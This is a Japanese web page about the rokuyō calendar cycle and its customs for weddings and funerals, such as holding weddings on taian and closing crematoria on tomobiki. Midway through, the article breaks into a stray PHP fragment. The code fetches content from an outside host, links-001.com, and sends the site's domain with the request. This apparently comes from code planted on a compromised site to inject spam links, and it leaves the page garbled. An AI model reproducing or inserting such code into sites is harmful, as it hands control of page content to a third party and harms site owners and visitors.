六曜と冠婚葬祭の関係性について

ビル

六曜は、暦注の中で最も有名なものの1つで、先勝、友引、先負、仏滅、大安、赤口の6種類の曜があります。
一般的なカレンダーを見るとわかるように、この順番で暦日に割り当てられています。
もともと、中国で生まれて日本に伝来されたという説が有力ですが、その時期については諸説あります。
それぞれの曜が意味を持ち、主に吉凶を表すものです。
庶民の生活を後ろ盾する文化的な側面がある一方で、あまりに吉凶を過剰に意識する人が増え、混乱を避けるために、一時は政府が介入(禁止)したこともあります。
1つの文化として捉えた場合、各曜と冠婚葬祭との関係として、次のような習慣が一般的です。
まず、友引は、葬式を行なうと友が冥土に引き寄せられるとの解釈があり、火葬場が休業するのが一般的でしたが、六曜と仏教とは関係がないとの理由から、宗派によっては友引に葬儀を行なうこともあり、火葬場も操業しているところはあります。
大安は最も吉の日とされ、慶事、特に婚礼が行なわれるのに縁起が良いとされています。
逆に、仏滅は最も凶の日とされ、慶事を避ける場合が多いです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連ページはコチラ

ほほえむ女性

冠婚葬祭における六曜

六曜は「ろくよう」「りくよう」などと読みます。
先勝、友引、先負、仏滅、大安、赤口の六種類あり

葉っぱ

六曜を気にしながら何かを行う

結婚式、葬式など、冠婚葬祭の日取りはとても気になるのではないでしょうか。
結婚式であれば人生の

ほほえむ女性

六曜捉え方はひとそれぞれ。知った上で他者に配慮を。

六曜に先勝・友引・先負・仏滅・大安・赤口の6つの曜があります。
日本においては、カレンダーや手

髪を掻き上げる女性

冠婚葬祭での六曜の受け入れ方

冠婚葬祭の行事の際に、暦注にある六曜を気にするひとは多いです。
先勝・友引・先負・仏滅・大安・